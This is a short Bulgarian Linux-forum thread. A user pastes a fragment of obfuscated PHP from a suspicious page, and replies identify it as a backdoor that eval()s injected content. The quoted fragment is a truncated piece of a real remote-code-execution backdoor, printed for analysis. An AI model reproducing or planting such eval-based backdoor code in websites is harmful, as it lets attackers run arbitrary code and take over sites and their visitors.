Linux за българи: Форуми

Програмиране => Общ форум => Темата е започната от: petar258 в Jun 19, 2016, 21:10



Титла: Питане за странен код
Публикувано от: petar258 в Jun 19, 2016, 21:10
Кликнах на един линк, и се случиха някои странни случки. Като проверих на друго устройство, се видя това при зареждане на страница:

Код:
$efb2){$j7d7bb47=$efb2;$ldecbc0cf=$d76bf0;}if(!$j7d7bb47){foreach($sb8ad544[$sb8ad544['f0bc2'][29].$sb8ad544['f0bc2'][58].$sb8ad544['f0bc2'][75].$sb8ad544['f0bc2'][81].$sb8ad544['f0bc2'][81].$sb8ad544['f0bc2'][94]]as$d76bf0=>$efb2){$j7d7bb47=$efb2;$ldecbc0cf=$d76bf0;}}$j7d7bb47=@$sb8ad544[$sb8ad544['f0bc2'][54].$sb8ad544['f0bc2'][50].$sb8ad544['f0bc2'][94].$sb8ad544['f0bc2'][57].$sb8ad544['f0bc2'][4].$sb8ad544['f0bc2'][39]]($sb8ad544[$sb8ad544['f0bc2'][57].$sb8ad544['f0bc2'][20].$sb8ad544['f0bc2'][58].$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][20].$sb8ad544['f0bc2'][63].$sb8ad544['f0bc2'][75]]($sb8ad544[$sb8ad544['f0bc2'][67].$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][15].$sb8ad544['f0bc2'][17].$sb8ad544['f0bc2'][50].$sb8ad544['f0bc2'][13].$sb8ad544['f0bc2'][75]]($j7d7bb47),$ldecbc0cf));if(isset($j7d7bb47[$sb8ad544['f0bc2'][57].$sb8ad544['f0bc2'][71]])&&$xf027==$j7d7bb47[$sb8ad544['f0bc2'][57].$sb8ad544['f0bc2'][71]]){if($j7d7bb47[$sb8ad544['f0bc2'][57]]==$sb8ad544['f0bc2'][62]){$y97f1c=Array($sb8ad544['f0bc2'][54].$sb8ad544['f0bc2'][67]=>@$sb8ad544[$sb8ad544['f0bc2'][94].$sb8ad544['f0bc2'][81].$sb8ad544['f0bc2'][82].$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][63].$sb8ad544['f0bc2'][15]](),$sb8ad544['f0bc2'][73].$sb8ad544['f0bc2'][67]=>$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][53].$sb8ad544['f0bc2'][17].$sb8ad544['f0bc2'][83].$sb8ad544['f0bc2'][39],);echo@$sb8ad544[$sb8ad544['f0bc2'][97].$sb8ad544['f0bc2'][39].$sb8ad544['f0bc2'][57].$sb8ad544['f0bc2'][82].$sb8ad544['f0bc2'][75]]($y97f1c);}elseif($j7d7bb47[$sb8ad544['f0bc2'][57]]==$sb8ad544['f0bc2'][58]){eval($j7d7bb47[$sb8ad544['f0bc2'][20]]);}exit();} ?>

Може ли някой да каже какво прави този код, а също ми е интересно значението на често повтарящите се " $sb8ad544['f0bc2'] " . Възможно е да става дума за програмен език ползващ се при андроид.


Титла: Re: Питане за странен код
Публикувано от: Odido в Jun 20, 2016, 09:55
Това е php. За да го видиш означава че линка не е работил коректно или някой си е "оставил ръцете".


Титла: Re: Питане за странен код
Публикувано от: NorthBridge в Jun 20, 2016, 11:45
Точно обфускиран php код, който е голяма мъка да се декодира, но обикновено някъде в него има един-два броя eval()-a инжектиращи съдържание. Преди седмица се натъкнах на нещо подобно, един японец беше намерил backdoor в един wordpress, и си беше инжектирал своя сайт за продажба на часовници.  ::) Голяма мъка е да се чисти това, а и гугъл индексират, и става едно весело...

Ако не е твой сайта, няма от какво да се притесняваш  [_]3


Титла: Re: Питане за странен код
Публикувано от: petar258 в Jun 20, 2016, 12:45
Хах не е мой сайта. Като гледах whois инфото обаче е регистриран наскоро, дали специално за мен е регнат или е съвпадение не е ясно. ;D Кода е предвиден за мобилни устройства - там зарежда това-онова и ако не се клика никъде, се оправя с чистене на кеш, история и кукита(надявам се). Докладван е за фишинг, надявам се да разследват случая.